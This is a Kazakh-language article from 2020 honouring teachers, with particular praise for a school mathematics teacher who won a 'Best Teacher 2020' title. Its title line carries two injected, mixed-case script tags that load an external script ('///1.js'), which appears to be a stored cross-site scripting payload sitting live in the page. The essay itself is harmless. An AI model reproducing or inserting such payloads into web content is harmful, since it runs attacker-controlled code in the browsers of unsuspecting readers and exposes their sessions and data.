Ұстаз – ұлы тұлға.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
16.10.2020
Ұстаз – баланың жеке тұлғасын қалыптастырушы,маңызды
тәлім-тәрбие өнегенің бастаушысы, жарқын үлгісі, бала қиялын
самғатып, арманын көкке ұмсындырушы тұлға.
М. Жұмабаев
Ұстаз – ұлы тұлға.
Ұстаз - балаға жеке тұлға ретінде қарай отырып, тәрбиелі,білімді,мәдениетті болуына ықпалын тигізеді.Тәлім-тәрбие беріп,баланың арман-қиялын көкке жеткізетін де,осы - ұстаз. Ұстаз деген сөзге лайық болу үшін, білімді,шығармашыл болу қажет. Ол үшін,әрқашан біліктілігін арттырып, үнемі тынбай еңбек етіп отырғаны абзал. Мектеп жұмысы мен оқушы жетістіктерін өрістетудегі негізгі тұлға – мұғалім. Мұғалім мамандығы -ауыр мамандық. Ол адамнан тек аса жоғары білімді ғана емес, сонымен қатар рухани күш пен табандылықты және батылдықты да талап етеді. Мұғалім ұстаным, көзқарас, шешім, іс-әрекет қағидаларын орындаса,оқушыларының алдында өз беделін жоғалтпайды деп ойлаймын. Осы орайда жаңа оқу жылындағы Ұстаздар мерекесі қарсаңында Ғ.Әбдірахманұлы атындағы Қима орта мектебінің математика пәнінің мұғалімі Сүлеймэн Еркегүлді аузымды кең ашып атап өтсем. ҚР әншісі, елін әлемге танытқан Димаш Құдайберген болса, Еркегүл ұстазымыз мектебіміздің атын облыс пен Республика көлеміне танытты. «Үздік ұстаз -2020 » атағына ие болды. Әрине ,ұстазымыздың зор еңбегін аса құрметпен бағалай отырып, деніне мықты саулық, білімді де , білікті екі азамат балаларын тәрбиелеп отыр, еңбек жолында үздіксіз жемісті табыс тілейміз.
«Мен болмасам, сіз барсыз, үміт еткен ұрпағым», - деп Ы.Алтынсарин атамыз нық сеніммен айтып өткендей болашақ ұрпағымыз білімді, көзі ашық, шығармашыл болу үшін, тынбай білім алып,тынбай еңбектену керек. Сондықтан ұрпағымыз ұқыпты болса,болашағымыз жарқын болады. «Ұстаздық еткен жалықпас, үйретуден балаға» дегендей әрқашан талмай еңбек етуден жалықпайық.
Аширханова Б.К.